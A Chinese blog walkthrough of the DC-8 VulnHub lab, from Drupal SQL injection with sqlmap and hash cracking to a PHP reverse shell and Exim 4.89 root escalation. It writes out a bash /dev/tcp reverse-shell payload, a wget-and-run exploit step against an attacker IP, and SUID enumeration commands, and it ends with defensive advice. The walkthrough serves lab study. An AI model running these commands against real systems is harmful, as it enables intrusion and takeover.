当前位置：首页 > article >正文

从Drupal后台到Root权限：手把手复现DC-8靶场的Exim 4.89提权完整流程

article 2026/4/22 3:52:15

从Drupal后台到Root权限手把手复现DC-8靶场的Exim 4.89提权完整流程在渗透测试的学习过程中靶机环境是最接近实战的训练场。DC-8作为VulnHub上经典的Drupal靶机提供了一个从Web漏洞到系统提权的完整攻击链。本文将深入剖析如何从Drupal 7的SQL注入漏洞入手逐步获取系统控制权最终利用Exim 4.89的SUID漏洞实现权限提升。1. 环境准备与信息收集任何渗透测试的第一步都是充分了解目标环境。我们使用Kali Linux作为攻击机与DC-8靶机处于同一局域网段。首先进行基础网络扫描确认靶机IP和开放服务netdiscover -r 192.168.108.0/24 nmap -sV -p- 192.168.108.141扫描结果显示靶机开放了两个关键服务22/tcp: OpenSSH 7.4p180/tcp: Apache httpd (Drupal CMS)通过目录扫描工具发现Drupal的典型结构dirb http://dc-8关键发现URL中存在?nid1参数这是Drupal常见的节点ID传参方式也是后续注入攻击的入口点。2. 利用SQL注入获取后台访问权限Drupal 7存在已知的SQL注入漏洞我们可以使用sqlmap进行自动化利用sqlmap -u http://dc-8/?nid* --risk3 --level5 --batch分步骤获取数据库信息确认当前数据库用户权限枚举数据库表结构提取用户凭证数据最终获取到两个关键用户凭证admin: $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5zjohn: $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF使用John the Ripper破解哈希john --wordlist/usr/share/wordlists/rockyou.txt hash.txt成功破解出john用户的密码为turtle这为我们提供了后台管理权限。3. 从后台到代码执行登录Drupal后台(http://dc-8/user)后我们发现可以通过内容编辑功能执行PHP代码。测试几种不同的反弹shell方式?php system(bash -i /dev/tcp/192.168.108.129/6868 01); ?在Kali上监听对应端口nc -lvnp 6868成功获取反向shell后首先升级为完全交互式终端python -c import pty; pty.spawn(/bin/bash)4. 权限提升Exim 4.89漏洞利用在低权限shell中我们检查SUID文件寻找提权机会find / -perm -4000 -type f 2/dev/null发现/usr/sbin/exim4具有SUID位且属主为root。检查版本exim4 --version确认版本为4.89后搜索已知漏洞searchsploit exim 4.89找到本地提权漏洞(CVE-2019-10149)下载并执行利用脚本wget http://192.168.108.129:9999/46996.sh -O /tmp/exploit.sh chmod x /tmp/exploit.sh /tmp/exploit.sh -m netcat成功获取root shell后可以在/root目录下找到最终的flag文件。技术原理深度解析SUID机制的安全隐患SUID(Set User ID)是Linux的一种特殊权限设置它允许用户以文件所有者的权限执行程序。当root用户拥有的程序设置了SUID位时任何执行该程序的用户都将临时获得root权限。如果这类程序存在漏洞就可能被利用来提升权限。Exim漏洞利用原理Exim 4.89的漏洞源于其对字符串处理的缺陷。攻击者可以通过精心构造的参数在调用特定函数时触发缓冲区溢出从而执行任意代码。由于exim以root权限运行这个漏洞可以直接获取root shell。防御建议及时更新软件Exim在后续版本中修复了该漏洞最小权限原则避免为不必要的程序设置SUID位输入验证对用户输入进行严格过滤日志监控关注异常进程执行行为这个案例展示了从Web应用到系统底层的完整攻击链理解每个环节的技术原理对安全防护至关重要。在实际渗透测试中类似的思路可以应用于许多现代Web应用系统。

从Drupal后台到Root权限：手把手复现DC-8靶场的Exim 4.89提权完整流程

相关文章：

从Drupal后台到Root权限：手把手复现DC-8靶场的Exim 4.89提权完整流程

毕业设计：基于springboot的乐享田园系统（源码）

保姆级教程：用PyTorch 2.0复现WDCNN轴承故障诊断模型（附CWRU数据集实战代码）

毕业设计：基于springboot的网上服装商城（源码）

别再死记硬背回溯算法了！用Python可视化带你玩转八皇后问题（附完整代码）

Maple Mono终极指南：如何快速打造你的完美编程字体体验

别再搞混了！Ubuntu 20.04上安装linux-headers-generic和指定版本有啥区别？

避坑指南：CEEMDAN参数（Nstd, NE, MaxIter）怎么调？附MATLAB代码与效果对比

别再乱用事件过滤器了！Qt中让QLineEdit智能失焦的两种正确姿势（附QCompleter处理）

宝塔面板无法识别数据库配置_检查配置文件是否存在乱码

华为防火墙双活链路部署避坑指南：IP-LINK和BFD到底该怎么选？

Excel工作表保护密码忘了？除了VBA宏，这3种官方和第三方方法你也该知道

Rdkit|从静态到交互：分子可视化的进阶实践

Rdkit|分子可视化实战：从基础绘制到批量生成与3D展示

手机拍HDR总有重影？聊聊动态场景多帧融合的演进与手机摄影中的实际应用

从立创EDA到AD20：一个PCB新手的完整避坑与实战布局指南

手把手教你配置UART：9600 8N1模式下的数据传输实战（含示波器截图）

告别纸上谈兵！用Keil uVision5和Proteus 8.9从零搭建51单片机流水灯（附完整资源包）

SQL如何检查字符串是否存在：INSTR与LOCATE函数使用

LaTeX新人避坑指南：用gbt7714-numerical.bst和gbt7714.sty排版参考文献，如何避免‘上标’陷阱与版本冲突报错

51单片机+DHT11温湿度传感器保姆级教程：从接线到LCD1602显示，附串口调试避坑指南

别再为OTA升级失败抓狂了！手把手教你排查涂鸦IoT平台MCU固件升级的6个常见坑

从STM32换到GD32，串口通信就崩了？聊聊MCU串口IP核那些‘看不见’的差异

别再被dom4j的‘前言中不允许有内容’搞懵了！手把手教你用XmlMapper搞定Java对象转XML

Android 7.1设备开机后上不了网？手把手教你排查APN加载与DcTracker拨号流程

微积分基本定理实战：5个常见积分上限函数求导案例解析

手把手教你用Docker Compose在Ubuntu 22.04上部署LangSmith监控平台（含PostgreSQL+Redis+ClickHouse配置）

告别双for循环！用NumPy的np.where()函数6倍速搞定医学图像分割可视化（附Synapse数据集实战代码）

【计算机组成原理实践】从门电路到运算器：Logisim 搭建加减法器全流程解析

基于DSP28335的三电平有源电力滤波器方案：全套软硬件资料，直接量产的智能化电力管理方案